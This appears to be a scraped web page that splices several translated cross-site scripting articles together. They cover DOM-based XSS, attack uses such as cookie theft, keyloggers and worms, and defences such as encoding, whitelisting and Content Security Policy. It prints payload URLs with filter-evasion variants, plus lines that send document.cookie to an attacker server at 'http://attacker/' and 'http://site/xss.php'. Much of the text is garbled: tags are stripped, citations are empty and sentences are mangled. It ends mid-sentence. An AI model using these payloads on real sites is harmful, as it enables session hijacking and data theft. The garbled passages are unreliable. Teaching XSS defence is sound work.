Xss injections. XSS attacks: what they are and why they are dangerous

Home / Doesn't turn on

We all know what cross-site scripting is, right? This is a vulnerability in which an attacker sends malicious data (usually HTML containing Javascript code) that is later returned by the application, causing Javascript code to be executed. So this is not true! There is a type of XSS attack that does not fit this definition, at least in its basic fundamental principles. XSS attacks, as defined above, are divided into instantaneous (malicious data is embedded in a page that is returned to the browser immediately after the request) and delayed (malicious data is returned after some time). But there is a third type of XSS attack, which is not based on sending malicious data to the server. Although it seems counterintuitive, there are two well-documented examples of such an attack. This article describes the third type of XSS attacks - XSS through DOM (DOM Based XSS). Nothing fundamentally new about the attack will be written here; rather, the innovation of this material is in highlighting distinctive features attacks that are very important and interesting.

Developers and application users must understand the principles of XSS attack via DOM, as it poses a threat to web applications and is different from regular XSS. There are many web applications on the Internet that are vulnerable to XSS via the DOM and at the same time tested for XSS and found “invulnerable” to this type of attack. Developers and site administrators should become familiar with techniques for detecting and protecting against XSS via the DOM, as these techniques differ from the techniques used to deal with standard XSS vulnerabilities.

Introduction

The reader should be familiar with the basic principles of XSS attacks (, , , , ). XSS usually refers to instant() and lazy cross-site scripting. With instant XSS, malicious code (Javascript) is returned by the attacked server immediately as a response to an HTTP request. Deferred XSS means that malicious code is stored on the attacked system and can later be injected into HTML page vulnerable system. As mentioned above, this classification assumes that the fundamental property of XSS is that malicious code is sent from a browser to a server and returned to the same browser (flash XSS) or any other browser (delayed XSS). This article raises the issue that this is a misclassification. The ability to carry out an XSS attack that does not rely on injecting code into the page returned by the server would have a major impact on security and detection techniques. The principles of such attacks are discussed in this article.

Example and comments

Before describing the simplest attack scenario, it is important to emphasize that the methods described here have already been publicly demonstrated several times (for example, , and ). I do not claim that the methods below are described for the first time (although some of them differ from previously published materials).

A sign of a vulnerable site may be the presence of an HTML page that uses data from document.location, document.URL or document.referrer (or any other objects that can be influenced by an attacker) in an insecure way.

Note for readers unfamiliar with these Javascript objects: When Javascript code runs in a browser, it accesses several objects represented within the DOM (Document Object Model). The document object is the main one of these objects and provides access to most of the page's properties. This object contains many nested objects such as location, URL and referrer. They are controlled by the browser according to the browser's point of view (as will be seen below, this is quite significant). So, document.URL and document.location contain the URL of the page, or more precisely, what the browser means by URL. Please note that these objects are not taken from the body of the HTML page. The document object contains a body object containing the parsed HTML code of the page.

It is not difficult to find an HTML page containing Javascript code that parses a URL string (accessed via document.URL or document.location) and, according to its value, performs some actions on the client side. Below is an example of such code.

By analogy with example in, consider the following HTML page (assuming the content is http://www.vulnerable.site/welcome.html):

Welcome! Hi var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length));
Welcome to our system…

However, a query like this -

http://www.vulnerable.site/welcome.html?name=alert(document.cookie)

would cause XSS. Let's look at why: the victim's browser, having received this link, sends an HTTP request to www.vulnerable.site and receives the aforementioned (static!) HTML page. The victim's browser begins to parse this HTML code. The DOM contains a document object that has a URL field, and this field is populated URL value current page during DOM creation process. When the parser reaches the Javascript code, it executes it, which causes modification of the HTML code of the displayed page. IN in this case, the code references document.URL and since part of this string is embedded in the HTML during parsing, which is immediately parsed, the detected code (alert(...)) is executed in the context of the same page.

Notes:

1. Malicious code is not embedded in the HTML page (unlike other types of XSS).
2. This exploit will work provided that the browser does not modify the URL characters. Mozilla automatically encodes '' characters (in %3C and %3E respectively) in nested document objects. If the URL was typed directly into the address bar, this browser is not vulnerable to the attack described in this example. However, if the attack does not require the '' characters (in its original unencoded form), the attack can be carried out. Microsoft Internet Explorer 6.0 does not encode '' and is therefore vulnerable to the described attack without any restrictions. However, there are many different attack scenarios that do not require '', and therefore even Mozilla is not immune to this attack.

Methods for detecting and preventing vulnerabilities of this type

In the example above, the malicious code is still sent to the server (as part of the HTTP request), so the attack can be detected just like any other XSS attack. But this is a solvable problem.

Consider the following example:

http://www.vulnerable.site/welcome.html#name=alert(document.cookie)

Note the '#' symbol to the right of the file name. It tells the browser that everything after this character is not part of the request. Microsoft Internet Explorer (6.0) and Mozilla do not send the fragment after the '#' character to the server, so for the server this request will be equivalent to http://www.vulnerable.site/welcome.html, i.e. malicious code will not even be noticed by the server. Thus, thanks to this technique, the browser does not send a malicious payload to the server.

However, in some cases it is not possible to hide the payload: in and malicious payload is part of the username in a URL like http://username@host/. In this case, the browser sends a request with an Authorization header containing the username (malicious payload), resulting in malicious code reaching the server (Base64 encoded - hence the IDS/IPS must first decode this data to detect the attack). However, the server is not required to inject this payload into one of the available HTML pages, although this is a necessary condition for executing an XSS attack.

Obviously, in situations where the payload can be completely hidden, detection (IPS) and prevention tools (IPS, web application firewalls) cannot completely protect against this attack. Even if the payload needs to be sent to the server, in many cases it can be transformed in a certain way to avoid detection. For example, if some parameter is protected (for example, the name parameter in the example above), a small change in the attack script can produce the following result:

(document.cookie)

A more stringent security policy would require that the name parameter be sent. In this case, you can make the following request:

http://www.vulnerable.site/welcome.html?notname=alert(document.cookie)&name=Joe

If your security policy restricts additional parameter names (for example: foobar), you can use the following option:

http://www.vulnerable.site/welcome.html?foobar=name=alert(document.cookie)&name=Joe

Please note that the ignored parameter (foobar) must come first and contain a payload in its value.

The attack scenario described in is even more preferable for the attacker, since the full value of document.location is written into the HTML page (the Javascript code does not search for a specific parameter name). Thus, an attacker could completely hide the payload by sending the following:

/attachment.cgi?id=&action=foobar#alert(document.cookie)

Even if the payload is parsed by the server, protection can only be guaranteed if the request is rejected or the response is replaced with some error text. Referring again to and: if the Authorization header is simply removed by the intermediate security system, it will have no effect if the original page is returned. Likewise, any attempt to process data on the server by removing or encoding illegal characters will be ineffective against this attack.

In the case of document.referrer, the payload is sent to the server via the Referer header. However, if the user's browser or intermediate protection removes this header, there will be no trace of the attack, which can go completely undetected.

To summarize, we conclude that traditional methods, namely

1. Coding HTML data server side
2. Server-side removal/encoding of prohibited inputs does not work against DOM XSS.

Automatically searching for vulnerabilities by “bombarding” malicious data (sometimes called fuzzing) will not work, since programs using this technique typically make inferences based on whether the embedded data is present in the returned page or not (instead of executing the code in the context of the browser on client side and monitoring the results). However, if the program can statically analyze the Javascript code found on the page, it may point out suspicious signs (see below). And of course, if security tools can execute Javascript code (and correctly initialize DOM objects) or emulate such execution, they will be able to detect this attack.

Manually searching for a vulnerability using a browser will also work, since the browser can execute client-side Javascript code. Vulnerability tools can adopt this method and run client-side code to monitor the results of its execution.
Effective protection

Avoid client-side document rewrites, redirects, or other similar actions that use client-side data. Most of these actions can be done using dynamic pages (server side).
2.

Analysis and improvement of code security (Javascript) on the client side. References to DOM objects that can be influenced by the user (the attacker) must be carefully checked. Particular attention should be paid to the following objects (but not limited to them):
* document.URL
* document.URLUnencoded
* document.location (and its properties)
* document.referrer
* window.location (and its properties)

Note that the properties of the document and window objects can be referenced in several ways: explicitly (example: window.location), implicitly (example: location), or by obtaining a handle and using it (example: handle_to_some_window.location).

Particular attention should be paid to code where the DOM is modified, either explicitly or potentially, through direct access to HTML or through access directly to the DOM. Examples (this is by no means an exhaustive list):
* Entry in the HTML code of the page:
o document.write(…)
o document.writeln(…)
o document.body.innerHtml=…
* Changing DOM directly (including DHTML events):
o document.forms.action=… (and other variations)
o document.attachEvent(…)
o document.create…(…)
o document.execCommand(…)
o document.body. ... (accessing the DOM via the body object)
o window.attachEvent(…)
* Changing document URL:
o document.location=… (as well as assigning href, host and hostname values to the location object)
o document.location.hostname=…
o document.location.replace(…)
o document.location.assign(…)
o document.URL=…
o window.navigate(…)
* Opening/modifying the window object:
o document.open(…)
o window.open(…)
o window.location.href=… (as well as assigning the host and hostname values to the location object)
* Executing the script directly:
o eval(…)
o window.execScript(…)
o window.setInterval(…)
o window.setTimeout(…)

Everyone has long known what XSS is and how to protect against it, so I’ll be brief. XSS is the ability of an attacker to do so in a certain way (link to possible options see the end of the article) integrate a script into the page of the victim site, which will be executed when it is visited.

Interestingly, in most cases where this vulnerability is described, we are scared with the following code:

http://www.site.com/page.php?var=‹script›alert("xss");

Somehow it’s not very scary :) How can this vulnerability really be dangerous?

Passive and active

There are two types of XSS vulnerabilities - passive and active.

Active vulnerability is more dangerous, since the attacker does not need to lure the victim using a special link; he just needs to inject the code into the database or some file on the server. Thus, all site visitors automatically become victims. It can be integrated, for example, using SQL injection. Therefore, you should not trust the data stored in the database, even if it was processed during insertion.

Example passive vulnerability You can see it at the very beginning of the article. This already requires social engineering, for example, an important letter from the site administration asking you to check your account settings after restoring from a backup. Accordingly, you need to know the victim’s address or simply arrange a spam mailing or post on some forum, and it’s not a fact that the victims will be naive and follow your link.

Moreover, both POST and GET parameters can be susceptible to passive vulnerability. With POST parameters, of course, you will have to resort to tricks. For example, a redirect from an attacker’s website.

document.getElementsByTagName("form").submit();

Therefore, GET vulnerability is a little more dangerous, because... it is easier for a victim to notice an incorrect domain than additional parameter(although the url can generally be encoded).

Stealing Cookies

This is the most commonly cited example of an XSS attack. Websites sometimes store some valuable information in Cookies (sometimes even the user’s login and password (or its hash)), but the most dangerous thing is the theft of an active session, so do not forget to click the “Exit” link on websites, even if this home computer. Fortunately, on most resources the session lifetime is limited.

var img = new Image(); img.srс = "http://site/xss.php?" + document.cookie;

That's why they introduced domain restrictions on XMLHttpRequest, but this is not a problem for an attacker, since there is, , , background:url(); etc.

Stealing data from forms

We look for the form through, for example, getElementById and monitor the onsubmit event. Now, before submitting the form, the entered data is also sent to the attacker’s server.

This type of attack is somewhat reminiscent of phishing, only it uses a real site rather than a fake one, which instills more trust in the victim.

DDoS attack (distributed denial of service attack)

An XSS vulnerability on heavily visited resources can be used to launch a DDoS attack. The essence is simple - there are many requests that the attacked server cannot withstand.
Actually, the relation to XSS is indirect, since scripts may not be used at all, a construction like this is enough:

Cross-Site Request Forgery (CSRF/XSRF)

Also indirectly related to XSS. This is actually a separate type of vulnerability, but is often used in conjunction with XSS. The bottom line is that a user authorized on an invulnerable site goes to a vulnerable one (or a special page of the attacker), from which a request is sent to perform certain actions.

Roughly speaking, ideally this should be the case. The user has logged in to the payment system. Then I went to the attacker’s website or a site with an XSS vulnerability, from which a request was sent to transfer money to the attacker’s account.

Therefore, most sites, when performing certain user actions (for example, changing e-mail), ask for a password or ask you to enter a confirmation code.

XSS worms

This type of attack probably appeared thanks to social networks such as VKontakte and Twitter. The point is that a link with an XSS vulnerability is sent to several users of the social network; when they click on the link, the integrated script sends messages to other users on their behalf, etc. At the same time, other actions can be performed, for example, sending personal data of victims to the attacker.

Harmless XSS

Interestingly, counters, by their very nature, are also an active XSS attack of some kind. After all, data about the visitor is transferred to a third-party server, such as his IP address, monitor resolution, etc. Only you integrate the code into your page of your own free will :) Take a look, for example, at the Google Analytic code.

And is a comprehensive tutorial on cross-site scripting.

Part One: Overview What is XSS?

Cross-site scripting ( English Cross-site scripting) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser.

The attacker does not attack his victim directly. Instead, it exploits a vulnerability in the website the victim is visiting and injects malicious JavaScript code. In the victim's browser, the malicious JavaScript appears as a legitimate part of the website, and the website itself acts as a direct accomplice to the attacker.

Injection of malicious JavaScript code

The only way for an attacker to run malicious JavaScript in a victim's browser is to inject it into one of the pages that the victim loads from the website. This is possible if a website allows users to enter data on its pages, and the attacker can insert a string that will be detected as part of the code in the victim's browser.

The example below shows a simple server-side script that is used to display the latest comment on a site:

print ""
print "Last comment:"
print database.latestComment
print ""

The script assumes that the comment consists of text only. However, since direct user input is enabled, an attacker could leave this comment: "..." . Any user visiting the page will now receive the following response:

Last comment:
...

When the user's browser loads the page, it will execute everything, including the JavaScript code contained inside the . The attacker successfully carried out the attack.

What is malicious JavaScript?

The ability to execute JavaScript in the victim's browser may not seem particularly malicious. JavaScript runs in a very limited environment that has extremely limited access to user files and operating system. In fact, you can open the JavaScript console in your browser right now and execute any JavaScript you want, and it is very unlikely that you will be able to cause any harm to your computer.

However, the potential for JavaScript code to act as malicious code becomes clearer when you consider the following facts:

JavaScript has access to some confidential information user, for example cookies.
JavaScript can send HTTP requests with arbitrary content in any direction using XMLHttpRequest and other mechanisms.
JavaScript can make arbitrary changes to the HTML code of the current page using DOM manipulation techniques.

If combined, these facts can cause very serious safety violations, details to follow.

Consequences of malicious JavaScript code

In addition, the ability to execute arbitrary JavaScript in another user's browser allows an attacker to carry out the following types of attacks:

Cookie theft

an attacker can access the victim's website-related cookies using document.cookie , send them to their own server and use them to extract sensitive information such as session IDs.

Keylogger

An attacker could register a keyboard event listener using addEventListener and then send all of the user's keystrokes to their server, potentially recording sensitive information such as passwords and credit card numbers.

Phishing

an attacker could insert a fake login form into a page using DOM manipulation, setting the form's action attributes to their own server, and then trick the user into obtaining sensitive information.

Although these attacks differ significantly, they all have one significant similarity: since the attacker injects code into the page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that site: it has access to the victim's data for that website (such as cookies) and the hostname displayed in the URL bar will be the same as the website. For all purposes, the script is considered a legal part of the website, allowing it to do anything that the website itself can do.

This fact highlights a key issue:

If an attacker can use your website to execute arbitrary JavaScript code in other users' browsers, the security of your website and its users is compromised.

To emphasize this point, some malicious script examples in this tutorial will be left without detail, using.... This suggests that the mere presence of a script being injected by an attacker is a problem, regardless of what specific script code is actually being executed.

Part two: XSS attack Participants in the XSS attack

Before we describe in detail how an XSS attack works, we need to define the actors involved in an XSS attack. In general, there are three parties to an XSS attack: the website, the victim, and the attacker.

The website provides HTML pages to users who request them. In our examples it is located at http://website/.
- A website database is a database that stores some of the data entered by users on the pages of a site.
The victim is regular user website that requests pages from it using its browser.
An attacker is an attacker who intends to launch an attack on a victim by exploiting an XSS vulnerability in a website.
- An attacker's server is a web server controlled by an attacker with the sole purpose of stealing the victim's confidential information. In our examples, it is located at http://attacker/.

Example attack scenario

window.location="http://attacker/?cookie="+document.cookie

This script will create an HTTP request to another URL, which will redirect the user's browser to the attacker's server. The URL includes the victim's cookies as a request parameter, when an HTTP request comes to the attacker's server, the attacker can extract these cookies from the request. Once the attacker has received the cookies, he can use them to impersonate the victim and launch a subsequent attack.

From now on, the HTML code shown above will be called a malicious string or malicious script. It is important to understand that the string itself is only malicious if it is ultimately rendered as HTML in the victim's browser, and this can only happen if there is an XSS vulnerability in the website.

How this example attack works

The diagram below shows an example of an attack by an attacker:

The attacker uses one of the website's forms to insert a malicious string into the website's database.

The victim requests a page from a website.

The site includes a malicious database string in the response and sends it to the victim.

The victim's browser executes a malicious script inside the response, sending the victim's cookie to the attacker's server.

XSS Types

The goal of an XSS attack is always to execute a malicious JavaScript script in the victim's browser. There are several fundamentally different ways to achieve this goal. XSS attacks are often divided into three types:

Stored (persistent) XSS, where the malicious string originates from the website's database.
Reflected (non-persistent) XSS, where the malicious string is generated from the victim's request.
XSS DOMs, where the vulnerability occurs in client-side code rather than server-side code.

The previous example shows a stored XSS attack. We will now describe two other types of XSS attacks: reflected XSS and DOM XSS attacks.

Reflected XSS

In a reflected XSS attack, the malicious string is part of the victim's request to the website. The site accepts and inserts this malicious string into the response sent back to the user. The diagram below illustrates this scenario:

The victim tricks the attacker into sending a URL request to the website.

The site includes a malicious string from the URL request in the response to the victim.

The victim's browser executes the malicious script contained in the response, sending the victim's cookies to the attacker's server.

How to successfully carry out a reflected XSS attack?

A reflected XSS attack may seem harmless because it requires the victim to send a request on their behalf that contains a malicious string. Since no one would voluntarily attack themselves, there seems to be no way to actually carry out the attack.

As it turns out, there are at least two common ways to get a victim to launch a reflected XSS attack against themselves:

If the user is a specific individual, the attacker could send a malicious URL to the victim (for example, using email or messenger) and trick him into opening a link to visit a website.
If the target is a large group of users, the attacker could post a link to a malicious URL (for example, on their own website or social network) and wait for visitors to follow the link.

Both of these methods are similar, and both can be more successful using URL shortening services that will mask the malicious string from users who might be able to identify it.

XSS in the DOM

XSS in the DOM is a variant of both stored and reflected XSS attacks. In this XSS attack, the malicious string is not processed by the victim's browser until the website's actual JavaScript is executed. The diagram below illustrates this scenario for a reflected XSS attack:

The attacker creates a URL containing a malicious string and sends it to the victim.

The victim tricks the attacker into sending a URL request to the website.

The site accepts the request, but does not include the malicious string in the response.

The victim's browser executes the legitimate script contained in the response, causing the malicious script to be inserted into the page.

The victim's browser executes a malicious script inserted into the page, sending the victim's cookies to the attacker's server.

What is the difference between XSS in the DOM?

In previous examples of stored and reflected XSS attacks, the server inserts a malicious script into a page, which is then forwarded in a response to the victim. When the victim's browser receives the response, it assumes that the malicious script is part of the page's legitimate content and automatically executes it while the page is loading, just like any other script.

In the example of an XSS attack in the DOM, the malicious script is not inserted as part of the page; the only script that is automatically executed when the page loads is a legitimate part of the page. The problem is that this legitimate script directly uses user input to add HTML to the page. Since the malicious string is inserted into the page using innerHTML , it is parsed as HTML, causing the malicious script to be executed.

This difference is small, but very important:

In traditional XSS, malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.
In the case of XSS in the DOM, malicious JavaScript is executed after the page has loaded, causing the legitimate JavaScript page to access user input (containing the malicious string) in an insecure manner.

How does XSS work in the DOM?

There is no need for JavaScript in the previous example; the server can generate all the HTML by itself. If the server-side code did not contain vulnerabilities, the website would not be susceptible to an XSS vulnerability.

However, as web applications become more advanced, more and more HTML pages are generated using JavaScript on the client side rather than on the server. At any time the content should change without refreshing the entire page, this is possible using JavaScript. In particular, this is the case when the page is refreshed after an AJAX request.

This means that XSS vulnerabilities can be present not only in the server-side code of your site, but also on the client-side JavaScript code of your site. Therefore, even with completely secure server-side code, client code may still not safely include user input when updating the DOM after the page has loaded. If this happens, the client-side code will allow an XSS attack to occur through no fault of the server-side code.

DOM-based XSS may not be visible to the server

There is a special case of an XSS attack in the DOM in which the malicious string is never sent to the website server: this occurs when the malicious string is contained in the identifier portion of the URL (anything after the # symbol). Browsers don't send this part of the URL to the server, so the website can't access it using server-side code. Client-side code, however, has access to it, and thus it is possible to conduct an XSS attack through insecure processing.

This case is not limited to the fragment ID. There is other user input that is invisible to the server, such as new HTML5 features such as LocalStorage and IndexedDB.

Part three:
XSS Prevention XSS Prevention Techniques

Recall that XSS is a code injection attack: user input is mistakenly interpreted as malicious. program code. To prevent this type of code injection, secure input handling is required. For a web developer, there are two fundamentally different ways perform secure input processing:

Encoding is a method that allows user input only as data and does not allow the browser to process it as code.
Validation is a way of filtering user input so that the browser interprets it as code without malicious commands.

Although these are fundamentally different XSS mitigation methods, they have several common features that are important to understand when using either one:

Context Secure input handling must be done differently depending on where on the page the user input is used. inbound/outbound Secure input processing can be done either when your site receives input (inbound traffic) or right before the site inserts user input into the page content (outbound). Client/Server Secure input processing can be done on either the client side or the server side, each option being needed under different circumstances.

Before explaining in detail how coding and validation works, we will describe each of these points.

Handling user input in contexts

There are many contexts on a web page where user input can be applied. For each of them, special rules must be followed to ensure that user input cannot escape its context and cannot be interpreted as malicious code. The following are the most common contexts:

Why do contexts matter?

In all of the described contexts, an XSS vulnerability could occur if user input was inserted before first encoding or validation. An attacker can inject malicious code simply by inserting a closing delimiter for this context followed by malicious code.

For example, if at some point the website involves user input directly into HTML attribute, an attacker would be able to inject a malicious script by starting their input with a quote, as shown below:

This could be prevented by simply removing all the quotes in the user input and everything would be fine, but only in this context. If the input was inserted into a different context, the closing delimiter will be different and injection will be possible. For this reason, secure input handling should always be tailored to the context where the user input will be inserted.

Handling incoming/outgoing user input

Instinctively, it would seem that XSS could be prevented by encoding or validating all user input as soon as our site receives it. This way, any malicious strings will already be neutralized whenever they are included in the page, and HTML generation scripts won't have to worry about handling user input safely.

The problem is that, as described earlier, user input can be inserted into multiple contexts on a page. And no simple way determine when user input arrives in a context - how it will ultimately be inserted, and the same user input often needs to be inserted in different contexts. By relying on processing incoming input to prevent XSS, we are creating a very brittle solution that will be error prone. (The legacy PHP "magic quotes" are an example of such a solution.)

Instead, outgoing input processing should be your primary line of defense against XSS because it can take into account the specific context of what user input will be inserted. To some extent, inbound validation can be used to add a secondary layer of security, but more on that later.

Where is it possible to handle user input securely?

In most modern web applications, user input is processed both on the server side and on the client side. To protect against all types of XSS, secure input handling must be done in both server-side and client-side code.

To protect against traditional XSS, secure input handling must be done in server-side code. This is done using some language supported by the server.
To protect against an XSS attack in the DOM, where the server never receives a malicious string (such as the identifier fragment attack described earlier), secure input handling must be done in client-side code. This is done using JavaScript.

Now that we've explained why context matters, why the distinction between incoming and outgoing input processing is important, and why secure input processing must be done on both sides, client side and server side, we can go on to explain. how the two types of secure input processing (encoding and validation) are actually performed.

Coding

Coding is a way out of a situation where it is necessary for the browser to interpret user input only as data, and not code. The most popular type of coding in web development is HTML masking, which converts characters such as< и >V< и >respectively.

The following pseudocode is an example of how user input (user input) can be encoded with using HTML masking and then inserted into the page using a server script:

print ""
print "Last comment: "
print encodeHtml(userInput)
print ""

If the user enters the following line..., the resulting HTML will look like this:

Last comment:
...

Because all the symbols are special meaning were masked, the browser will not parse any part of the user input like HTML.

Coding client and server side code

When performing client-side encoding, JavaScript is always used, which has built-in functions that encode data for different contexts.

When doing the coding in your server-side code, you rely on the features available in your language or framework. Because of large quantity languages and frameworks available, this tutorial will not cover the details of coding in any specific server language or framework. However, JavaScript coding functions used on the client side are also used when writing server-side code.

Client side coding

When encoding client-side user input using JavaScript, there are several built-in methods and properties that automatically encode all data in a context-sensitive style:

The last context already mentioned above (values in JavaScript) is not included in this list because JavaScript does not provide a built-in way of encoding data that will be included in source code JavaScript.

Encoding Limitations

Even when coding, it is possible to use malicious strings in some contexts. A clear example of this is when user input is used to provide a URL, such as in the example below:

document.querySelector("a").href = userInput

Although specifying a value on an element's href property automatically encodes it so that it becomes nothing more than an attribute value, this in itself does not prevent an attacker from inserting a URL starting with "javascript:". When a link is clicked, regardless of construction, the embedded JavaScript within the URL will be executed.

Coding is also not effective solution when you want users to be able to use part of the HTML codes on the page. An example would be a user profile page where the user can use custom HTML. If this plain HTML is encoded, the profile page will only be able to consist of plain text.

In such situations, coding must be complemented by validation, which we will look at later.

Validation

Validation is the act of filtering user input so that all malicious parts of it are removed, without having to remove all the code in it. One of the most used types of validation in web development allows you to use some HTML elements (for example, and ) while disabling others (for example, ).

There are two main characteristic checks, which differ in their implementations:

Classification Strategy User input can be classified using blacklists or whitelists. Validation Result User input identified as malicious can be rejected or sanitized.

Classification strategy Blacklist

Instinctively, it seems appropriate to perform the check by defining a forbidden pattern that should not appear in user input. If a line matches this pattern, it is marked as invalid. For example, allow users to submit custom URLs with any protocol except javascript: . This classification strategy is called blacklist.

However, the blacklist has two main disadvantages:

The difficulty of accurately describing the set of all possible malicious strings is typically a very difficult task. The example policy described above cannot be successfully implemented by simple search by the substring "javascript", because it will miss a string like "Javascript:" (where the first letter in uppercase) and "javascript:" (where the first letter is encoded as a numeric character reference). Deprecation Even if a perfect blacklist were developed, it would be useless if a new feature added to the browser could be used for attack. For example, if an HTML validation blacklist was developed before the onmousewheel attribute was introduced in HTML5, it would not be able to stop an attacker from using this attribute to perform an XSS attack. This disadvantage is especially important in web development, which consists of many different technologies that are constantly updated.

Because of these shortcomings, blacklisting is strongly discouraged as a classification strategy. Whitelisting is generally a much more secure approach, which we'll describe next.

Whitelist

Whitelist is essentially the opposite of a blacklist: instead of defining a prohibited pattern, the approach whitelist determines the allowed pattern and marks the input as invalid if it is does not correspond this template.

In contrast to blacklists, an example of whitelists would be to allow users to submit custom URLs containing only the http: and https: protocols, nothing more. This approach would allow a URL to be automatically marked as invalid if it contains the javascript: protocol, even if it is represented as "Javascript:" or "javascript:".

Compared to a blacklist, whitelists have two main advantages:

Simplicity Accurately describing the set of benign strings is usually much easier than identifying the set of all malicious strings. This is especially applicable in general situations where user input must include a very limited set functionality available in the browser. For example, the whitelist described above very simply allows URLs to be used only with the HTTP: or https: protocols allowed, and in most situations this is quite enough for users. Durability Unlike a blacklist, a whitelist typically does not become obsolete when a new feature is added to the browser. For example, HTML whitelist validation allows only the title attributes of HTML elements to remain safe, even if it (the whitelist) was designed before the introduction of the HTML5 onmousewheel attribute.

Validation result

When user input has been marked as invalid (forbidden), one of two actions can be taken:

Rejecting input is simply rejected, preventing it from being used elsewhere on the site. Sanitizing all invalid parts of the input data are removed and the remaining input is used on the website as usual.

Of the two, deflection is the simplest approach to implement. But disinfection is considered to be more useful because it provides a wider range of input for the user. For example, if a user sends a number credit card, sanitizing will remove all non-characters and prevent code injection, and also allows the user to enter a number with or without hyphens.

If you decide to implement disinfection, you need to ensure that the disinfection procedure itself does not use a blacklist approach. For example, the URL "Javascript:...", even if identified using a whitelist as invalid, would receive a sanitization bypass routine that simply removes all instances of "javascript:". For this reason, well-tested libraries and frameworks should use sanitization whenever possible.

What methods should be used for prevention?

Encoding should be your first line of defense against XSS attacks, its purpose is to process data in such a way that the browser cannot interpret user input as code. In some cases, coding must be complemented by validation. Coding and validation must be applied to outgoing traffic because only then can you know in what context the user input will be applied and what encoding and validation needs to be applied.

As a second line of defense, you should apply incoming data sanitization or rejection of clearly invalid user input, such as links, using the javascript: protocol. This cannot by itself provide complete security, but it is a useful precaution if any point in the coding and validation protection could fail due to incorrect execution.

If these two lines of defense are used consistently, your site will be protected from XSS attacks. However, due to the complexity of creating and maintaining a website, providing complete security using only secure user input processing can be difficult. As a third line of defense, you should use Content Security Policies ( English Content Security Policy), then CSP, which we will describe below.

Content Security Policies (CSP)

Using only secure user input handling to protect against XSS attacks is not enough because even one security mistake can compromise your website. Adopting Content Security Policies (CSPs) from the new web standard can reduce this risk.

CSPs are used to restrict a browser's use of a web page so that it can only use resources downloaded from trusted sources. A resources are scripts, style sheets, images, or some other type of file that is referenced on a page. This means that even if an attacker manages to inject malicious content into your site, the CSP will be able to prevent it from being executed.

CSP can be used to enforce the following rules:

Banning Untrusted Sources External resources can only be downloaded from a set of clearly defined trusted sources. By disallowing embedded resources, inline JavaScript and CSS will not be taken into account. Disabling eval prohibits the use of the eval function in JavaScript.

CSP in action

In the following example, the attacker managed to inject malicious code to the web page:

Last comment:

With a correctly defined CSP policy, the browser cannot download and execute malicious-script.js because http://attacker/ is not specified as a trusted source. Even though the site failed to reliably process user input in this case, the CSP's policy prevented the vulnerability from causing any harm.

Even if the attacker injected code inside the script code, and not with a link to external file, a properly configured CSP policy will also prevent injection into JavaScript code, preventing vulnerability and causing any harm.

How to enable CSP?

By default, browsers do not use CSP. In order to enable SCP on your website, pages must contain an additional HTTP header: Content‑Security‑Policy. Any page containing this header will enforce security policies when loaded by the browser, provided the browser supports CSP.

Because the security policy is sent with every HTTP response, it is possible for the server to set the policy individually for each page. The same policy can be applied to the entire website by inserting the same CSP header in every response.

The value in the Content‑Security‑Policy header contains a string that defines one or more security policies that will run on your site. The syntax of this line will be described below.

The heading examples in this section use line breaks and indentations for ease of reference; they should not appear in the actual title.

CSP Syntax

The CSP header syntax is as follows:

Content-Security-Policy:
directive source-expression, source-expression, ...;
directive ...;
...

This syntax consists of two elements:

Directives are strings indicating the type of resource taken from a given list.
Source expressions are models that describe one or more servers from which resources can be loaded.

For each directive, the data in the source expression specifies which sources can be used to load resources of the corresponding type.

Directives

The following directives can be used in the CSP header:

connect-src
font-src
frame-src
img-src
media-src
object‑src
script-src
style-src

In addition to this, the special default-src directive can be used to provide a default value for all directives that were not included in the header.

Source expression

The syntax for creating a source expression is as follows:

protocol:// hostname: port number

The hostname can start with *, meaning that any subdomain of the provided hostname will be resolved. Similarly, the port number can be represented as *, which means that all ports will be allowed. Additionally, the protocol and port number may be omitted. If no protocol is specified, the policy will require that all resources be loaded using HTTPS.

In addition to the above syntax, the source expression can alternatively be one of four keywords with a special meaning (quotes included):

"none" disables resources. "self" allows resources from the host on which the web page is located. "unsafe‑inline" resolves resources contained on the page as inline elements, elements, and javascript: URLs. "unsafe-eval" enables the JavaScript function eval .

Please note that whenever CSP is used, built-in resources and eval are automatically disabled by default. Using "unsafe-inline" and "unsafe-eval" is the only way to use them.

Example Policy

Content-Security-Policy:
script‑src "self" scripts.example.com;
media‑src "none";
img‑src *;
default‑src "self" http://*.example.com

With this example policy, the web page will have the following restrictions:

Scripts can only be downloaded from the host on which the web page is located and from this address: scripts.example.com.
Audio and video files are prohibited from downloading.
Image files can be downloaded from any address.
All other resources can only be loaded from the host on which the web page is located and from any subdomain of example.com.

CSP status

As of June 2013, Content Security Policies are recommended by the W3C consortium. CSP is implemented by browser developers, but some parts of it are specific to browsers. different browsers. For example, HTTP header usage may differ between browsers. Before using CSP, consult the documentation of the browsers you plan to support.

Summary Summary: XSS Overview

An XSS attack is a code injection attack made possible by insecure processing of user input.
A successful XSS attack allows the attacker to execute malicious JavaScript in the victim's browser.
A successful XSS attack compromises the security of both the website and its users.

Summary: XSS attacks

There are three main types of XSS attacks:
- Stored XSS, where malicious input originates from the website's database.
- Reflected XSS, where malicious input originates from the victim's request.
- XSS attacks in the DOM, where the vulnerability is exploited in code on the client side, and not on the server side.
All of these attacks are performed differently, but have the same effect if successful.

Summary: Preventing XSS

The most important way to prevent XSS attacks is to perform secure input processing.
- Encoding must be done whenever user input is enabled on the page.
- In some cases, coding must be replaced or supplemented by validation.
- Secure input handling must take into account what page context the user input is being inserted into.
- In order to prevent all types of XSS attacks, secure input processing must be done in both client-side and server-side code.
Content Security Policies (CSP) provide an additional layer of protection in the event that secure input processing contains an error.

Appendix Terminology

It should be noted that there is a crossover in the terminology used to describe XSS: an XSS attack in the DOM can be either stored or reflected; These are not separate types of attacks. There is no generally accepted terminology that covers all types of XSS without confusion. Regardless of the terminology used to describe XSS, the most important thing is to determine the type of attack, this is possible if you know where the malicious input is coming from and where the vulnerability is located.

Rights of use and links

The source code for Excess XSS is available on GitHub.

Excess XSS was created in 2013 as part of the Language-Based Security course at Chalmers University of Technology.

Translation into Russian was performed by A888R, original text in English: excess-xss.com, send comments, suggestions and errors in translation here.

Cross-site scripting, or Cross site scripting, or XSS, involves a site that includes unintended Javascript code, which in turn is transmitted to users who execute the code in their browsers. A harmless example of XSS (which is exactly what you should use!) looks like this:

